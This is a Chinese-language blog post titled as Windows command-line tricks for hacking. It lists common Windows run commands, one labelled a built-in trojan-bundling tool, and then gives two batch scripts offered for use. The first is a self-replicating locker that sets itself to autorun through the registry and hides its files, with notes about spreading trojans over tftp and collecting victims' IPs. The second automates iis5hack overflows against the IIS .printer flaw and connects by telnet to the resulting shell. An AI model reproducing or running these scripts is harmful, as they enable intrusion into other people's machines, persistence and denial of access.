Sunday, January 27, 2019

Windows DOS Shell Command for hacking

Windows CMD collections:

winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置

control.exe--------控制面板
write----------写字板

notepad--------打开记事本

mspaint--------画图板



winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天

mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令

dxdiag---------检查directx信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------dvd播放器

net stop messenger-----停止信使服务
net start messenger----开始信使服务
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口

syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护

tsshutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器

eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器


packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器

regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持

cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------sql server 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序

osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令


iexpress-------木马捆绑工具,系统自带

Nslookup-------IP地址侦测器

fsmgmt.msc-----共享文件夹管理器

utilman--------辅助工具管理器

gpedit.msc-----组策略
=====================================================================

Here are some collected shell command line scripts:

1.
此批处理用处:
可以锁定计算机防止黑客远程控制
黑客无法解除锁定,即使知道了密码
许多关于此批处理的想法,现在简要说几点
1.用tftp来传木马
2.将中了此批处理的的IP都发到一个地方(此想法以解决)
以下是代码:
@echo off
echo rundll32.exe user32.dll,LockWorkStation>>wm.bat
echo for %%%f in (*.bat) do wm.bat %%%f  in (*.bat) do wm.bat %%%f in (*.bat) do wm.bat %%%f>>wm.bat
echo Windows Registry Editor Version 5.00 > wm.reg
echo.>> wm.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] >> wm.reg
echo.>> wm.reg
echo "wmbat"="d://wm.bat" >>wm.reg
regedit /s wm.reg
copy wm.bat d:/
attrib d:/wm.bat +h +r +s
attrib wm.bat +h +r +s
attrib wm.reg +h +r +s
wm.bat

XPSP2测试成功
==================================================================

2.
利用iis5hack.exe对有.printer漏洞的主机进行溢出的批处理。用到的程序有iis5hack.exe和系统自带的telnet.exe。iis5hack的命令格式为:

iis5hack <目标ip> <目标端口> <目标版本> <溢出连接端口>

目标版本为0-9这10个数字,分别对应不同语言版本和sp的系统版本,我们编制的批处理使用的命令格式为:

iis.bat 目标ip [开始版本号]

开始版本号可有可无。程序如下。

@echo off
if "%1"=="" goto help
if not EXIST iis5hack.exe goto file
ping %1 -n 1 | find "Received = 1"
if errorlevel 1 goto error

rem 如果指定的系统值不合法, 则默认从9开始
if "%~2"=="" set beginSys=9 & goto ScanSys
if %~2 LSS 9 if %~2 GEQ 0 set beginSys=%~2 & goto ScanSys
set beginSys=9

:ScanSys
    rem 开始溢出目标端口80 系统代码9,8,7,...,0 溢出连接端口88
    rem 在执行结果中查找字符串“good”(溢出成功后才会有字符串good)
    rem 如果没有错误代码1(溢出成功)就执行telnet段的内容。
    for /L %%a in (%beginSys%, -1, 0) do (
        iis5hack %1 80 %%a 88 | find "good"
        if not errorlevel 1 goto telnet
        echo 操作系统类型 %%a 失败!
    )
    goto error

:telnet
    telnet %1 88
    goto exit

:error
    echo 可能网络不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次!
    echo iis5hack [目标IP] [WEB端口] [系统类型] [开放端口]
    ECHO 中文:         0
    ECHO 中文+sp1:     1
    ECHO 英文:         2
    ECHO 英文+sp1:     3
    ECHO 日语:         4
    ECHO 日语+sp1:     5
    ECHO 韩文:         6
    ECHO 韩文+sp1:     7
    ECHO 墨西哥语:     8
    ECHO 墨西哥语+sp1: 9
    goto exit

:file
    echo 文件iis5hack.exe没有发现!程序终止运行!
    goto exit

:help
    echo 本程序用法如下:
    echo iis [目标ip]
    echo iis [目标ip] [开始的号码9-0]

:exit
--------------------- --------------------------------------------------------------------------------------



No comments: